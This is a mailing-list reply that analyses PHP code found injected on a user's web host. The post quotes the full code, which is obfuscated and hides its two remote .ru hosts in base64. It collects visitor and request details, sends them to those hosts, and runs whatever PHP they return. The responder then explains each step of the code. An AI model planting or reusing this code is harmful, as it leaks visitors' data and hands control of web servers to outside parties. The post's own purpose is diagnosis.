Barbara M. wrote: > <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? > $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? > $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) > ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) > ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? > $_SERVER["QUERY_STRING"] : > $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? > $_SERVER["HTTP_REFERER"] : > $HTTP_REFERER);$g=(isset($_SERVER['HTTP_USER_AGENT']) ? > $_SERVER['HTTP_USER_AGENT'] : > $HTTP_USER_AGENT);$h=(isset($_SERVER['REMOTE_ADDR']) ? > $_SERVER['REMOTE_ADDR'] : > $REMOTE_ADDR);$str=base64_encode($a).'.'.base64_encode($b).'.'.base64_encode($c).'.'.base64_encode($d).'.'.base64_encode($e).'.'.base64_encode($f).'.'.base64_encode($g).'.'.base64_encode($h); > > if > ((include(base64_decode('aHR0cDovLw==').base64_decode('dXNlcjkubXNodG1sLnJ1')."/?".$str))){} > > else > {include(base64_decode('aHR0cDovLw==').base64_decode('dXNlcjcuaHRtbHRh > Z3MucnU=')."/?".$str);} ?>
let's pick this apart... first, it disables error reporting, then it sets some vars to various predefined vars (from apache/php); $a: HTTP_HOST (the virtualhost) $b: SERVER_NAME (the "primary" hostname) $c: REQUEST_URI (the uri requested (/foo/bar/baz.php/bleh?a=2)) $d: PHP_SELF (name of php file being executed) $e: QUERY_STRING (part of url following '?') $f: HTTP_REFERER (url that linked to the script) $g: HTTP_USER_AGENT (you know this one, right? ;) $h: REMOTE_ADDR (IP of client) then, it base64encodes these values (ie. 62.101.244.10 becomes NjIuMTAxLjI0NC4xMA==) into the variable $str then it includes http://user9.mshtml.ru/?<captured data> or if that fails, it includes http://user7.htmltags.ru/?<captured data> at which point, the server would execute whatever php code one (or both) of those servers would return, if http fopen wrappers are enabled for the server (ie.: safemode is off) > > Any idea on what this code is? > The vhost owner tell isn't the author- did that clarify? Cheers, -- Morten _______________________________________________ tsl-discuss mailing list tsl-discuss@lists.trustix.org http://lists.trustix.org/mailman/listinfo/tsl-discuss